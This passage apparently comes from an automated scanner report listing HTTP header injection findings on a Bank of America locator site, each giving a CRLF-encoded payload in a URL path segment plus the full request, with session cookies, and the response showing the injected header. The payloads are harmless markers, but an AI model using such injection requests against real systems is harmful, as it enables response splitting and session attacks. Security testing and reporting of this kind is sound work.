Cookie: JSESSIONID=FCD7363643DB9D12D507D043B5F3CED5.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; TCID=0007b046-77e2-485a-acb6-a45400000014; CMAVID=70121306499602161810121; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; SURVEY_SHOWN_IN_LAST_6_MONTHS=Y; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C1%2C1; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(1%2C'ATM-31691'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; NSC_CbolPgBnfsjdb=445b32097852; BOA_COM_BT_ELIGIBLE=No; session_start_time=1309296687564; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; throttle_value=31

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:35:00 GMT
Server: Apache
Set-Cookie: JSESSIONID=1F1BCEDEEBAC8C874B4215CDB040015C.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/ddc43
0ed6538be97/SessionTimeoutNotification.jsp?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.183. http://locators.bankofamerica.com/locator/locator/jsp/SessionTimeoutNotification.jsp [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/jsp/SessionTimeoutNotification.jsp

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 515ec%0d%0a6a3de5809a0 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/jsp/515ec%0d%0a6a3de5809a0 HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FCD7363643DB9D12D507D043B5F3CED5.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; TCID=0007b046-77e2-485a-acb6-a45400000014; CMAVID=70121306499602161810121; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; SURVEY_SHOWN_IN_LAST_6_MONTHS=Y; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C1%2C1; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(1%2C'ATM-31691'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; NSC_CbolPgBnfsjdb=445b32097852; BOA_COM_BT_ELIGIBLE=No; session_start_time=1309296687564; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; throttle_value=31

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:35:01 GMT
Server: Apache
Set-Cookie: JSESSIONID=B0ECA06981D9E7F027215B5AC1BA68EC.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/jsp/515ec
6a3de5809a0?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.184. http://locators.bankofamerica.com/locator/locator/jsp/content/BOFA_StyleSheet.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/jsp/content/BOFA_StyleSheet.css

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload fc16c%0d%0a4b99eb2509f was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/jsp/content/fc16c%0d%0a4b99eb2509f HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:50 GMT
Server: Apache
Set-Cookie: JSESSIONID=4DAA8309586B6506C1905BD6E91A7C32.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/jsp/content/fc16c
4b99eb2509f?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.185. http://locators.bankofamerica.com/locator/locator/jsp/content/BOFA_StyleSheetChrome.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/jsp/content/BOFA_StyleSheetChrome.css

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 12967%0d%0a0bd3f44d82 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/jsp/content/12967%0d%0a0bd3f44d82 HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:20 GMT
Server: Apache
Set-Cookie: JSESSIONID=5036874AA47FF613BF06DBD8EF44B218.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/jsp/content/12967
0bd3f44d82?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.186. http://locators.bankofamerica.com/locator/locator/jsp/content/borders_CSS.jsp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/jsp/content/borders_CSS.jsp

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 7ded8%0d%0ab888f20a45d was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/7ded8%0d%0ab888f20a45d/content/borders_CSS.jsp HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:32:40 GMT
Server: Apache
Set-Cookie: JSESSIONID=CDCE354E9583E35727FD694011F216D4.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/7ded8
b888f20a45d/content/borders_CSS.jsp?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.187. http://locators.bankofamerica.com/locator/locator/jsp/content/borders_CSS.jsp [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/jsp/content/borders_CSS.jsp

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 7f77a%0d%0abd20228825 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/jsp/7f77a%0d%0abd20228825/borders_CSS.jsp HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:32:53 GMT
Server: Apache
Set-Cookie: JSESSIONID=920BF42B1FA65272914ED86CC37B354C.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/jsp/7f77a
bd20228825/borders_CSS.jsp?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.188. http://locators.bankofamerica.com/locator/locator/jsp/content/borders_CSS.jsp [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/jsp/content/borders_CSS.jsp

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload b6a08%0d%0ad1c44b656b1 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/jsp/content/b6a08%0d%0ad1c44b656b1 HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:32:54 GMT
Server: Apache
Set-Cookie: JSESSIONID=CFF0A84F3582FB57A34DE09C8B802712.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/jsp/content/b6a08
d1c44b656b1?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.189. http://locators.bankofamerica.com/locator/locator/jsp/content/footprintMapAndBalloon_CSS.jsp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/jsp/content/footprintMapAndBalloon_CSS.jsp

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 2a1fc%0d%0ad8b7014c9a was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/2a1fc%0d%0ad8b7014c9a/content/footprintMapAndBalloon_CSS.jsp HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:32:28 GMT
Server: Apache
Set-Cookie: JSESSIONID=471AB252A62A61466C94280ED3CF3D25.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/2a1fc
d8b7014c9a/content/footprintMapAndBalloon_CSS.jsp?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.190. http://locators.bankofamerica.com/locator/locator/jsp/content/footprintMapAndBalloon_CSS.jsp [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/jsp/content/footprintMapAndBalloon_CSS.jsp

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 1cd4f%0d%0a56d23cd7878 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/jsp/1cd4f%0d%0a56d23cd7878/footprintMapAndBalloon_CSS.jsp HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:31:56 GMT
Server: Apache
Set-Cookie: JSESSIONID=E9834CC7E2901799D1D6446FFAEE0550.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/jsp/1cd4f
56d23cd7878/footprintMapAndBalloon_CSS.jsp?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.191. http://locators.bankofamerica.com/locator/locator/jsp/content/footprintMapAndBalloon_CSS.jsp [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/jsp/content/footprintMapAndBalloon_CSS.jsp

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload e875a%0d%0a1a1e7daa489 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/jsp/content/e875a%0d%0a1a1e7daa489 HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:32:06 GMT
Server: Apache
Set-Cookie: JSESSIONID=BB7C77ACA357BB126584B773BF215922.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/jsp/content/e875a
1a1e7daa489?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.192. http://locators.bankofamerica.com/locator/locator/jsp/content/pushpins_CSS.jsp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/jsp/content/pushpins_CSS.jsp

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 763eb%0d%0af52e6612976 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/763eb%0d%0af52e6612976/content/pushpins_CSS.jsp HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; CMAVID=70121306499602161810121; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296076997; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%7D

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:32:33 GMT
Server: Apache
Set-Cookie: JSESSIONID=3CADE42AFB9600D7557093D3EAEC78D9.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/763eb
f52e6612976/content/pushpins_CSS.jsp?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.193. http://locators.bankofamerica.com/locator/locator/jsp/content/pushpins_CSS.jsp [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/jsp/content/pushpins_CSS.jsp

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload d0c3a%0d%0ad1cf653e3bb was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/jsp/d0c3a%0d%0ad1cf653e3bb/pushpins_CSS.jsp HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
